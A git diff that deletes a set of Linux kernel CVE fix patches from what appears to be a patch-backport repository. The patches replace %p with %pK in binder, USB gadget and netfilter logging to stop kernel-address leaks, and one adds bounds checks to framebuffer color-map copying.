- 				node->accept_fds = !!(fp->flags & FLAT_BINDER_FLAG_ACCEPTS_FDS);
- 			}
- 			if (fp->cookie != node->cookie) {
--				binder_user_error("binder: %d:%d sending u%p "
--					"node %d, cookie mismatch %p != %p\n",
-+				binder_user_error("binder: %d:%d sending u%pK "
-+					"node %d, cookie mismatch %pK != %pK\n",
- 					proc->pid, thread->pid,
- 					fp->binder, node->debug_id,
- 					fp->cookie, node->cookie);
-@@ -1675,7 +1675,7 @@ static void binder_transaction(struct binder_proc *proc,
- 
- 			trace_binder_transaction_node_to_ref(t, node, ref);
- 			binder_debug(BINDER_DEBUG_TRANSACTION,
--				     "        node %d u%p -> ref %d desc %d\n",
-+				     "        node %d u%pK -> ref %d desc %d\n",
- 				     node->debug_id, node->ptr, ref->debug_id,
- 				     ref->desc);
- 		} break;
-@@ -1705,7 +1705,7 @@ static void binder_transaction(struct binder_proc *proc,
- 				binder_inc_node(ref->node, fp->type == BINDER_TYPE_BINDER, 0, NULL);
- 				trace_binder_transaction_ref_to_node(t, ref);
- 				binder_debug(BINDER_DEBUG_TRANSACTION,
--					     "        ref %d desc %d -> node %d u%p\n",
-+					     "        ref %d desc %d -> node %d u%pK\n",
- 					     ref->debug_id, ref->desc, ref->node->debug_id,
- 					     ref->node->ptr);
- 			} else {
-@@ -1941,7 +1941,7 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread,
- 			node = binder_get_node(proc, node_ptr);
- 			if (node == NULL) {
- 				binder_user_error("binder: %d:%d "
--					"%s u%p no match\n",
-+					"%s u%pK no match\n",
- 					proc->pid, thread->pid,
- 					cmd == BC_INCREFS_DONE ?
- 					"BC_INCREFS_DONE" :
-@@ -1950,8 +1950,8 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread,
- 				break;
- 			}
- 			if (cookie != node->cookie) {
--				binder_user_error("binder: %d:%d %s u%p node %d"
--					" cookie mismatch %p != %p\n",
-+				binder_user_error("binder: %d:%d %s u%pK node %d"
-+					" cookie mismatch %pK != %pK\n",
- 					proc->pid, thread->pid,
- 					cmd == BC_INCREFS_DONE ?
- 					"BC_INCREFS_DONE" : "BC_ACQUIRE_DONE",
-@@ -2006,19 +2006,19 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread,
- 			buffer = binder_buffer_lookup(proc, data_ptr);
- 			if (buffer == NULL) {
- 				binder_user_error("binder: %d:%d "
--					"BC_FREE_BUFFER u%p no match\n",
-+					"BC_FREE_BUFFER u%pK no match\n",
- 					proc->pid, thread->pid, data_ptr);
- 				break;
- 			}
- 			if (!buffer->allow_user_free) {
- 				binder_user_error("binder: %d:%d "
--					"BC_FREE_BUFFER u%p matched "
-+					"BC_FREE_BUFFER u%pK matched "
- 					"unreturned buffer\n",
- 					proc->pid, thread->pid, data_ptr);
- 				break;
- 			}
- 			binder_debug(BINDER_DEBUG_FREE_BUFFER,
--				     "binder: %d:%d BC_FREE_BUFFER u%p found buffer %d for %s transaction\n",
-+				     "binder: %d:%d BC_FREE_BUFFER u%pK found buffer %d for %s transaction\n",
- 				     proc->pid, thread->pid, data_ptr, buffer->debug_id,
- 				     buffer->transaction ? "active" : "finished");
- 
-@@ -2118,7 +2118,7 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread,
- 			}
- 
- 			binder_debug(BINDER_DEBUG_DEATH_NOTIFICATION,
--				     "binder: %d:%d %s %p ref %d desc %d s %d w %d for node %d\n",
-+				     "binder: %d:%d %s %pK ref %d desc %d s %d w %d for node %d\n",
- 				     proc->pid, thread->pid,
- 				     cmd == BC_REQUEST_DEATH_NOTIFICATION ?
- 				     "BC_REQUEST_DEATH_NOTIFICATION" :
-@@ -2172,7 +2172,7 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread,
- 						"d BC_CLEAR_DEATH_NOTIFI"
- 						"CATION death notificat"
- 						"ion cookie mismatch "
--						"%p != %p\n",
-+						"%pK != %pK\n",
- 						proc->pid, thread->pid,
- 						death->cookie, cookie);
- 					break;
-@@ -2208,11 +2208,11 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread,
- 				}
- 			}
- 			binder_debug(BINDER_DEBUG_DEAD_BINDER,
--				     "binder: %d:%d BC_DEAD_BINDER_DONE %p found %p\n",
-+				     "binder: %d:%d BC_DEAD_BINDER_DONE %pK found %pK\n",
- 				     proc->pid, thread->pid, cookie, death);
- 			if (death == NULL) {
- 				binder_user_error("binder: %d:%d BC_DEAD"
--					"_BINDER_DONE %p not found\n",
-+					"_BINDER_DONE %pK not found\n",
- 					proc->pid, thread->pid, cookie);
- 				break;
- 			}
-@@ -2423,13 +2423,13 @@ retry:
- 
- 				binder_stat_br(proc, thread, cmd);
- 				binder_debug(BINDER_DEBUG_USER_REFS,
--					     "binder: %d:%d %s %d u%p c%p\n",
-+					     "binder: %d:%d %s %d u%pK c%pK\n",
- 					     proc->pid, thread->pid, cmd_name, node->debug_id, node->ptr, node->cookie);
- 			} else {
- 				list_del_init(&w->entry);
- 				if (!weak && !strong) {
- 					binder_debug(BINDER_DEBUG_INTERNAL_REFS,
--						     "binder: %d:%d node %d u%p c%p deleted\n",
-+						     "binder: %d:%d node %d u%pK c%pK deleted\n",
- 						     proc->pid, thread->pid, node->debug_id,
- 						     node->ptr, node->cookie);
- 					rb_erase(&node->rb_node, &proc->nodes);
-@@ -2437,7 +2437,7 @@ retry:
- 					binder_stats_deleted(BINDER_STAT_NODE);
- 				} else {
- 					binder_debug(BINDER_DEBUG_INTERNAL_REFS,
--						     "binder: %d:%d node %d u%p c%p state unchanged\n",
-+						     "binder: %d:%d node %d u%pK c%pK state unchanged\n",
- 						     proc->pid, thread->pid, node->debug_id, node->ptr,
- 						     node->cookie);
- 				}
-@@ -2462,7 +2462,7 @@ retry:
- 			ptr += sizeof(void *);
- 			binder_stat_br(proc, thread, cmd);
- 			binder_debug(BINDER_DEBUG_DEATH_NOTIFICATION,
--				     "binder: %d:%d %s %p\n",
-+				     "binder: %d:%d %s %pK\n",
- 				      proc->pid, thread->pid,
- 				      cmd == BR_DEAD_BINDER ?
- 				      "BR_DEAD_BINDER" :
-@@ -2532,7 +2532,7 @@ retry:
- 		binder_stat_br(proc, thread, cmd);
- 		binder_debug(BINDER_DEBUG_TRANSACTION,
- 			     "binder: %d:%d %s %d %d:%d, cmd %d"
--			     "size %zd-%zd ptr %p-%p\n",
-+			     "size %zd-%zd ptr %pK-%pK\n",
- 			     proc->pid, thread->pid,
- 			     (cmd == BR_TRANSACTION) ? "BR_TRANSACTION" :
- 			     "BR_REPLY",
-@@ -2609,7 +2609,7 @@ static void binder_release_work(struct list_head *list)
- 
- 			death = container_of(w, struct binder_ref_death, work);
- 			binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
--				"binder: undelivered death notification, %p\n",
-+				"binder: undelivered death notification, %pK\n",
- 				death->cookie);
- 			kfree(death);
- 			binder_stats_deleted(BINDER_STAT_DEATH);
-@@ -2942,7 +2942,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma)
- #ifdef CONFIG_CPU_CACHE_VIPT
- 	if (cache_is_vipt_aliasing()) {
- 		while (CACHE_COLOUR((vma->vm_start ^ (uint32_t)proc->buffer))) {
--			printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %p bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer);
-+			printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %pK bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer);
- 			vma->vm_start += PAGE_SIZE;
- 		}
- 	}
-@@ -2974,7 +2974,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma)
- 	proc->vma = vma;
- 	proc->vma_vm_mm = vma->vm_mm;
- 
--	/*printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %p\n",
-+	/*printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %pK\n",
- 		 proc->pid, vma->vm_start, vma->vm_end, proc->buffer);*/
- 	return 0;
- 
-@@ -3168,7 +3168,7 @@ static void binder_deferred_release(struct binder_proc *proc)
- 				void *page_addr = proc->buffer + i * PAGE_SIZE;
- 				binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
- 					     "binder_release: %d: "
--					     "page %d at %p not freed\n",
-+					     "page %d at %pK not freed\n",
- 					     proc->pid, i,
- 					     page_addr);
- 				unmap_kernel_range((unsigned long)page_addr,
-@@ -3251,7 +3251,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix,
- 				     struct binder_transaction *t)
- {
- 	seq_printf(m,
--		   "%s %d: %p from %d:%d to %d:%d code %x flags %x pri %ld r%d",
-+		   "%s %d: %pK from %d:%d to %d:%d code %x flags %x pri %ld r%d",
- 		   prefix, t->debug_id, t,
- 		   t->from ? t->from->proc->pid : 0,
- 		   t->from ? t->from->pid : 0,
-@@ -3265,7 +3265,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix,
- 	if (t->buffer->target_node)
- 		seq_printf(m, " node %d",
- 			   t->buffer->target_node->debug_id);
--	seq_printf(m, " size %zd:%zd data %p\n",
-+	seq_printf(m, " size %zd:%zd data %pK\n",
- 		   t->buffer->data_size, t->buffer->offsets_size,
- 		   t->buffer->data);
- }
-@@ -3273,7 +3273,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix,
- static void print_binder_buffer(struct seq_file *m, const char *prefix,
- 				struct binder_buffer *buffer)
- {
--	seq_printf(m, "%s %d: %p size %zd:%zd %s\n",
-+	seq_printf(m, "%s %d: %pK size %zd:%zd %s\n",
- 		   prefix, buffer->debug_id, buffer->data,
- 		   buffer->data_size, buffer->offsets_size,
- 		   buffer->transaction ? "active" : "delivered");
-@@ -3296,7 +3296,7 @@ static void print_binder_work(struct seq_file *m, const char *prefix,
- 		break;
- 	case BINDER_WORK_NODE:
- 		node = container_of(w, struct binder_node, work);
--		seq_printf(m, "%snode work %d: u%p c%p\n",
-+		seq_printf(m, "%snode work %d: u%pK c%pK\n",
- 			   prefix, node->debug_id, node->ptr, node->cookie);
- 		break;
- 	case BINDER_WORK_DEAD_BINDER:
-@@ -3358,7 +3358,7 @@ static void print_binder_node(struct seq_file *m, struct binder_node *node)
- 	hlist_for_each_entry(ref, pos, &node->refs, node_entry)
- 		count++;
- 
--	seq_printf(m, "  node %d: u%p c%p hs %d hw %d ls %d lw %d is %d iw %d",
-+	seq_printf(m, "  node %d: u%pK c%pK hs %d hw %d ls %d lw %d is %d iw %d",
- 		   node->debug_id, node->ptr, node->cookie,
- 		   node->has_strong_ref, node->has_weak_ref,
- 		   node->local_strong_refs, node->local_weak_refs,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch
deleted file mode 100644
index 900b5337..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch
+++ /dev/null
@@ -1,111 +0,0 @@
-diff --git a/drivers/usb/gadget/u_data_hsic.c b/drivers/usb/gadget/u_data_hsic.c
-index ec13488..469a7a0 100644
---- a/drivers/usb/gadget/u_data_hsic.c
-+++ b/drivers/usb/gadget/u_data_hsic.c
-@@ -172,7 +172,7 @@
- 	struct usb_request	*req;
- 	unsigned long		flags;
- 
--	pr_debug("%s: ep:%s head:%p num:%d cb:%p", __func__,
-+	pr_debug("%s: ep:%s head:%pK num:%d cb:%pK", __func__,
- 			ep->name, head, num, cb);
- 
- 	for (i = 0; i < num; i++) {
-@@ -289,7 +289,7 @@
- 		return -ENOTCONN;
- 	}
- 
--	pr_debug("%s: p:%p#%d skb_len:%d\n", __func__,
-+	pr_debug("%s: p:%pK#%d skb_len:%d\n", __func__,
- 			port, port->port_num, skb->len);
- 
- 	spin_lock_irqsave(&port->tx_lock, flags);
-@@ -333,7 +333,7 @@
- 	}
- 
- 	while ((skb = __skb_dequeue(&port->rx_skb_q))) {
--		pr_debug("%s: port:%p tom:%lu pno:%d\n", __func__,
-+		pr_debug("%s: port:%pK tom:%lu pno:%d\n", __func__,
- 				port, port->to_modem, port->port_num);
- 
- 		info = (struct timestamp_info *)skb->cb;
-@@ -441,7 +441,7 @@
- 	struct timestamp_info	*info;
- 	unsigned int		created;
- 
--	pr_debug("%s: port:%p\n", __func__, port);
-+	pr_debug("%s: port:%pK\n", __func__, port);
- 	if (!port)
- 		return;
- 
-@@ -498,7 +498,7 @@
- 	struct usb_ep	*ep_out, *ep_in;
- 	int		ret;
- 
--	pr_debug("%s: port:%p\n", __func__, port);
-+	pr_debug("%s: port:%pK\n", __func__, port);
- 
- 	if (!port)
- 		return;
-@@ -545,7 +545,7 @@
- 	struct gdata_port	*port =
- 		container_of(w, struct gdata_port, connect_w);
- 	int			ret;
--	printk("%s: connected=%d, CH_READY=%d, port=%p\n",
-+	printk("%s: connected=%d, CH_READY=%d, port=%pK\n",
- 		__func__, atomic_read(&port->connected),
- 		test_bit(CH_READY, &port->bridge_sts), port);
- 	if (!port || !atomic_read(&port->connected) ||
-@@ -554,7 +554,7 @@
- 		return;
- 	}
- 
--	pr_debug("%s: port:%p\n", __func__, port);
-+	pr_debug("%s: port:%pK\n", __func__, port);
- 
- 	ret = data_bridge_open(&port->brdg);
- 	if (ret) {
-@@ -746,7 +746,7 @@
- 
- 	platform_driver_register(pdrv);
- 
--	pr_debug("%s: port:%p portno:%d\n", __func__, port, port_num);
-+	pr_debug("%s: port:%pK portno:%d\n", __func__, port, port_num);
- 
- 	return 0;
- }
-@@ -855,14 +855,14 @@
- 
- 	ret = usb_ep_enable(port->in);
- 	if (ret) {
--		pr_err("%s: usb_ep_enable failed eptype:IN ep:%p",
-+		pr_err("%s: usb_ep_enable failed eptype:IN ep:%pK",
- 				__func__, port->in);
- 		goto fail;
- 	}
- 
- 	ret = usb_ep_enable(port->out);
- 	if (ret) {
--		pr_err("%s: usb_ep_enable failed eptype:OUT ep:%p",
-+		pr_err("%s: usb_ep_enable failed eptype:OUT ep:%pK",
- 				__func__, port->out);
- 		usb_ep_disable(port->in);
- 		goto fail;
-@@ -938,7 +938,7 @@
- 	write_lock_irqsave(&dbg_data.lck, flags);
- 
- 	scnprintf(dbg_data.buf[dbg_data.idx], DBG_DATA_MSG,
--		  "%p %u[%s] %u %u %u %u %u %u\n",
-+		  "%pK %u[%s] %u %u %u %u %u %u\n",
- 		  skb, skb->len, event, info->created, info->rx_queued,
- 		  info->rx_done, info->rx_done_sent, info->tx_queued,
- 		  get_timestamp());
-@@ -1012,7 +1012,7 @@
- 		spin_lock_irqsave(&port->rx_lock, flags);
- 		temp += scnprintf(buf + temp, DEBUG_BUF_SIZE - temp,
- 				"\nName:           %s\n"
--				"#PORT:%d port#:   %p\n"
-+				"#PORT:%d port#:   %pK\n"
- 				"data_ch_open:	   %d\n"
- 				"data_ch_ready:    %d\n"
- 				"\n******UL INFO*****\n\n"
diff --git a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch.base64
deleted file mode 100644
index 3dfd3895..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvdXNiL2dhZGdldC91X2RhdGFfaHNpYy5jIGIvZHJpdmVycy91c2IvZ2FkZ2V0L3VfZGF0YV9oc2ljLmMKaW5kZXggZWMxMzQ4OC4uNDY5YTdhMCAxMDA2NDQKLS0tIGEvZHJpdmVycy91c2IvZ2FkZ2V0L3VfZGF0YV9oc2ljLmMKKysrIGIvZHJpdmVycy91c2IvZ2FkZ2V0L3VfZGF0YV9oc2ljLmMKQEAgLTE3Miw3ICsxNzIsNyBAQAogCXN0cnVjdCB1c2JfcmVxdWVzdAkqcmVxOwogCXVuc2lnbmVkIGxvbmcJCWZsYWdzOwogCi0JcHJfZGVidWcoIiVzOiBlcDolcyBoZWFkOiVwIG51bTolZCBjYjolcCIsIF9fZnVuY19fLAorCXByX2RlYnVnKCIlczogZXA6JXMgaGVhZDolcEsgbnVtOiVkIGNiOiVwSyIsIF9fZnVuY19fLAogCQkJZXAtPm5hbWUsIGhlYWQsIG51bSwgY2IpOwogCiAJZm9yIChpID0gMDsgaSA8IG51bTsgaSsrKSB7CkBAIC0yODksNyArMjg5LDcgQEAKIAkJcmV0dXJuIC1FTk9UQ09OTjsKIAl9CiAKLQlwcl9kZWJ1ZygiJXM6IHA6JXAjJWQgc2tiX2xlbjolZFxuIiwgX19mdW5jX18sCisJcHJfZGVidWcoIiVzOiBwOiVwSyMlZCBza2JfbGVuOiVkXG4iLCBfX2Z1bmNfXywKIAkJCXBvcnQsIHBvcnQtPnBvcnRfbnVtLCBza2ItPmxlbik7CiAKIAlzcGluX2xvY2tfaXJxc2F2ZSgmcG9ydC0+dHhfbG9jaywgZmxhZ3MpOwpAQCAtMzMzLDcgKzMzMyw3IEBACiAJfQogCiAJd2hpbGUgKChza2IgPSBfX3NrYl9kZXF1ZXVlKCZwb3J0LT5yeF9za2JfcSkpKSB7Ci0JCXByX2RlYnVnKCIlczogcG9ydDolcCB0b206JWx1IHBubzolZFxuIiwgX19mdW5jX18sCisJCXByX2RlYnVnKCIlczogcG9ydDolcEsgdG9tOiVsdSBwbm86JWRcbiIsIF9fZnVuY19fLAogCQkJCXBvcnQsIHBvcnQtPnRvX21vZGVtLCBwb3J0LT5wb3J0X251bSk7CiAKIAkJaW5mbyA9IChzdHJ1Y3QgdGltZXN0YW1wX2luZm8gKilza2ItPmNiOwpAQCAtNDQxLDcgKzQ0MSw3IEBACiAJc3RydWN0IHRpbWVzdGFtcF9pbmZvCSppbmZvOwogCXVuc2lnbmVkIGludAkJY3JlYXRlZDsKIAotCXByX2RlYnVnKCIlczogcG9ydDolcFxuIiwgX19mdW5jX18sIHBvcnQpOworCXByX2RlYnVnKCIlczogcG9ydDolcEtcbiIsIF9fZnVuY19fLCBwb3J0KTsKIAlpZiAoIXBvcnQpCiAJCXJldHVybjsKIApAQCAtNDk4LDcgKzQ5OCw3IEBACiAJc3RydWN0IHVzYl9lcAkqZXBfb3V0LCAqZXBfaW47CiAJaW50CQlyZXQ7CiAKLQlwcl9kZWJ1ZygiJXM6IHBvcnQ6JXBcbiIsIF9fZnVuY19fLCBwb3J0KTsKKwlwcl9kZWJ1ZygiJXM6IHBvcnQ6JXBLXG4iLCBfX2Z1bmNfXywgcG9ydCk7CiAKIAlpZiAoIXBvcnQpCiAJCXJldHVybjsKQEAgLTU0NSw3ICs1NDUsNyBAQAogCXN0cnVjdCBnZGF0YV9wb3J0CSpwb3J0ID0KIAkJY29udGFpbmVyX29mKHcsIHN0cnVjdCBnZGF0YV9wb3J0LCBjb25uZWN0X3cpOwogCWludAkJCXJldDsKLQlwcmludGsoIiVzOiBjb25uZWN0ZWQ9JWQsIENIX1JFQURZPSVkLCBwb3J0PSVwXG4iLAorCXByaW50aygiJXM6IGNvbm5lY3RlZD0lZCwgQ0hfUkVBRFk9JWQsIHBvcnQ9JXBLXG4iLAogCQlfX2Z1bmNfXywgYXRvbWljX3JlYWQoJnBvcnQtPmNvbm5lY3RlZCksCiAJCXRlc3RfYml0KENIX1JFQURZLCAmcG9ydC0+YnJpZGdlX3N0cyksIHBvcnQpOwogCWlmICghcG9ydCB8fCAhYXRvbWljX3JlYWQoJnBvcnQtPmNvbm5lY3RlZCkgfHwKQEAgLTU1NCw3ICs1NTQsNyBAQAogCQlyZXR1cm47CiAJfQogCi0JcHJfZGVidWcoIiVzOiBwb3J0OiVwXG4iLCBfX2Z1bmNfXywgcG9ydCk7CisJcHJfZGVidWcoIiVzOiBwb3J0OiVwS1xuIiwgX19mdW5jX18sIHBvcnQpOwogCiAJcmV0ID0gZGF0YV9icmlkZ2Vfb3BlbigmcG9ydC0+YnJkZyk7CiAJaWYgKHJldCkgewpAQCAtNzQ2LDcgKzc0Niw3IEBACiAKIAlwbGF0Zm9ybV9kcml2ZXJfcmVnaXN0ZXIocGRydik7CiAKLQlwcl9kZWJ1ZygiJXM6IHBvcnQ6JXAgcG9ydG5vOiVkXG4iLCBfX2Z1bmNfXywgcG9ydCwgcG9ydF9udW0pOworCXByX2RlYnVnKCIlczogcG9ydDolcEsgcG9ydG5vOiVkXG4iLCBfX2Z1bmNfXywgcG9ydCwgcG9ydF9udW0pOwogCiAJcmV0dXJuIDA7CiB9CkBAIC04NTUsMTQgKzg1NSwxNCBAQAogCiAJcmV0ID0gdXNiX2VwX2VuYWJsZShwb3J0LT5pbik7CiAJaWYgKHJldCkgewotCQlwcl9lcnIoIiVzOiB1c2JfZXBfZW5hYmxlIGZhaWxlZCBlcHR5cGU6SU4gZXA6JXAiLAorCQlwcl9lcnIoIiVzOiB1c2JfZXBfZW5hYmxlIGZhaWxlZCBlcHR5cGU6SU4gZXA6JXBLIiwKIAkJCQlfX2Z1bmNfXywgcG9ydC0+aW4pOwogCQlnb3RvIGZhaWw7CiAJfQogCiAJcmV0ID0gdXNiX2VwX2VuYWJsZShwb3J0LT5vdXQpOwogCWlmIChyZXQpIHsKLQkJcHJfZXJyKCIlczogdXNiX2VwX2VuYWJsZSBmYWlsZWQgZXB0eXBlOk9VVCBlcDolcCIsCisJCXByX2VycigiJXM6IHVzYl9lcF9lbmFibGUgZmFpbGVkIGVwdHlwZTpPVVQgZXA6JXBLIiwKIAkJCQlfX2Z1bmNfXywgcG9ydC0+b3V0KTsKIAkJdXNiX2VwX2Rpc2FibGUocG9ydC0+aW4pOwogCQlnb3RvIGZhaWw7CkBAIC05MzgsNyArOTM4LDcgQEAKIAl3cml0ZV9sb2NrX2lycXNhdmUoJmRiZ19kYXRhLmxjaywgZmxhZ3MpOwogCiAJc2NucHJpbnRmKGRiZ19kYXRhLmJ1ZltkYmdfZGF0YS5pZHhdLCBEQkdfREFUQV9NU0csCi0JCSAgIiVwICV1WyVzXSAldSAldSAldSAldSAldSAldVxuIiwKKwkJICAiJXBLICV1WyVzXSAldSAldSAldSAldSAldSAldVxuIiwKIAkJICBza2IsIHNrYi0+bGVuLCBldmVudCwgaW5mby0+Y3JlYXRlZCwgaW5mby0+cnhfcXVldWVkLAogCQkgIGluZm8tPnJ4X2RvbmUsIGluZm8tPnJ4X2RvbmVfc2VudCwgaW5mby0+dHhfcXVldWVkLAogCQkgIGdldF90aW1lc3RhbXAoKSk7CkBAIC0xMDEyLDcgKzEwMTIsNyBAQAogCQlzcGluX2xvY2tfaXJxc2F2ZSgmcG9ydC0+cnhfbG9jaywgZmxhZ3MpOwogCQl0ZW1wICs9IHNjbnByaW50ZihidWYgKyB0ZW1wLCBERUJVR19CVUZfU0laRSAtIHRlbXAsCiAJCQkJIlxuTmFtZTogICAgICAgICAgICVzXG4iCi0JCQkJIiNQT1JUOiVkIHBvcnQjOiAgICVwXG4iCisJCQkJIiNQT1JUOiVkIHBvcnQjOiAgICVwS1xuIgogCQkJCSJkYXRhX2NoX29wZW46CSAgICVkXG4iCiAJCQkJImRhdGFfY2hfcmVhZHk6ICAgICVkXG4iCiAJCQkJIlxuKioqKioqVUwgSU5GTyoqKioqXG5cbiIK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-8404/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8404/ANY/0001.patch
deleted file mode 100644
index e5256268..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8404/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 232ec805c7cc4150f05aa06a98335378ab272ec7 Mon Sep 17 00:00:00 2001
-From: chengengjia <chengjia4574@gmail.com>
-Date: Wed, 14 Sep 2016 14:10:56 +0800
-Subject: usb: diag: prevent showing the address of kernel variable 'port'
-
-The format specifier %p can leak kernel address while not valuing the kptr_strict system settings.
-The fix is designed to use %pK instead of %p, which also evaluates whether kptr_restrict is set.
-
-Signed-off-by: chengengjia <chengjia4574@gmail.com>
-Test: compile
-Bug: 31496950
-Change-Id: Ib93c0defdd68f4afe46b5a818ce4d1a2b850cf46
----
- drivers/usb/gadget/u_ctrl_hsic.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/u_ctrl_hsic.c b/drivers/usb/gadget/u_ctrl_hsic.c
-index ff3fbf3..1c5f160 100644
---- a/drivers/usb/gadget/u_ctrl_hsic.c
-+++ b/drivers/usb/gadget/u_ctrl_hsic.c
-@@ -557,7 +557,7 @@ static ssize_t gctrl_read_stats(struct file *file, char __user *ubuf,
- 
- 		temp += scnprintf(buf + temp, DEBUG_BUF_SIZE - temp,
- 				"\nName:        %s\n"
--				"#PORT:%d port: %p\n"
-+				"#PORT:%d port: %pK\n"
- 				"to_usbhost:    %lu\n"
- 				"to_modem:      %lu\n"
- 				"cpkt_drp_cnt:  %lu\n"
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8405/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8405/ANY/0001.patch
deleted file mode 100644
index a1219b3b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8405/ANY/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 2dc705a9930b4806250fbf5a76e55266e59389f2 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Tue, 24 Jan 2017 15:18:24 -0800
-Subject: fbdev: color map copying bounds checking
-
-Copying color maps to userspace doesn't check the value of to->start,
-which will cause kernel heap buffer OOB read due to signedness wraps.
-
-CVE-2016-8405
-
-Link: http://lkml.kernel.org/r/20170105224249.GA50925@beast
-Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Reported-by: Peter Pi (@heisecode) of Trend Micro
-Cc: Min Chong <mchong@google.com>
-Cc: Dan Carpenter <dan.carpenter@oracle.com>
-Cc: Tomi Valkeinen <tomi.valkeinen@ti.com>
-Cc: Bartlomiej Zolnierkiewicz <b.zolnierkie@samsung.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- drivers/video/fbdev/core/fbcmap.c | 26 ++++++++++++++------------
- 1 file changed, 14 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/video/fbdev/core/fbcmap.c b/drivers/video/fbdev/core/fbcmap.c
-index f89245b..68a1135 100644
---- a/drivers/video/fbdev/core/fbcmap.c
-+++ b/drivers/video/fbdev/core/fbcmap.c
-@@ -163,17 +163,18 @@ void fb_dealloc_cmap(struct fb_cmap *cmap)
- 
- int fb_copy_cmap(const struct fb_cmap *from, struct fb_cmap *to)
- {
--	int tooff = 0, fromoff = 0;
--	int size;
-+	unsigned int tooff = 0, fromoff = 0;
-+	size_t size;
- 
- 	if (to->start > from->start)
- 		fromoff = to->start - from->start;
- 	else
- 		tooff = from->start - to->start;
--	size = to->len - tooff;
--	if (size > (int) (from->len - fromoff))
--		size = from->len - fromoff;
--	if (size <= 0)
-+	if (fromoff >= from->len || tooff >= to->len)
-+		return -EINVAL;
-+
-+	size = min_t(size_t, to->len - tooff, from->len - fromoff);
-+	if (size == 0)
- 		return -EINVAL;
- 	size *= sizeof(u16);
- 
-@@ -187,17 +188,18 @@ int fb_copy_cmap(const struct fb_cmap *from, struct fb_cmap *to)
- 
- int fb_cmap_to_user(const struct fb_cmap *from, struct fb_cmap_user *to)
- {
--	int tooff = 0, fromoff = 0;
--	int size;
-+	unsigned int tooff = 0, fromoff = 0;
-+	size_t size;
- 
- 	if (to->start > from->start)
- 		fromoff = to->start - from->start;
- 	else
- 		tooff = from->start - to->start;
--	size = to->len - tooff;
--	if (size > (int) (from->len - fromoff))
--		size = from->len - fromoff;
--	if (size <= 0)
-+	if (fromoff >= from->len || tooff >= to->len)
-+		return -EINVAL;
-+
-+	size = min_t(size_t, to->len - tooff, from->len - fromoff);
-+	if (size == 0)
- 		return -EINVAL;
- 	size *= sizeof(u16);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8406/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8406/ANY/0001.patch
deleted file mode 100644
index 1ef84511..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8406/ANY/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From d7a15270ad80aff21d09aaea9c0e98e03e541b50 Mon Sep 17 00:00:00 2001
-From: Min Chong <mchong@google.com>
-Date: Thu, 13 Oct 2016 17:15:35 -0700
-Subject: [PATCH] netfilter: Change %p to %pK in debug messages
-
-The format specifier %p can leak kernel addresses
-while not valuing the kptr_restrict system settings.
-Use %pK instead of %p, which also evaluates whether
-kptr_restrict is set.
-
-Bug: 31796940
-Change-Id: Ia2946d6b493126d68281f97778faf578247f088e
-Signed-off-by: Min Chong <mchong@google.com>
----
- net/netfilter/nf_conntrack_core.c | 20 ++++++++++----------
- 1 file changed, 10 insertions(+), 10 deletions(-)
-
-diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
-index 1c118edd4b794..d9b86c2e96e24 100644
---- a/net/netfilter/nf_conntrack_core.c
-+++ b/net/netfilter/nf_conntrack_core.c
-@@ -188,7 +188,7 @@ EXPORT_SYMBOL_GPL(nf_ct_invert_tuple);
- static void
- clean_from_lists(struct nf_conn *ct)
- {
--	pr_debug("clean_from_lists(%p)\n", ct);
-+	pr_debug("clean_from_lists(%pK)\n", ct);
- 	hlist_nulls_del_rcu(&ct->tuplehash[IP_CT_DIR_ORIGINAL].hnnode);
- 	hlist_nulls_del_rcu(&ct->tuplehash[IP_CT_DIR_REPLY].hnnode);
- 
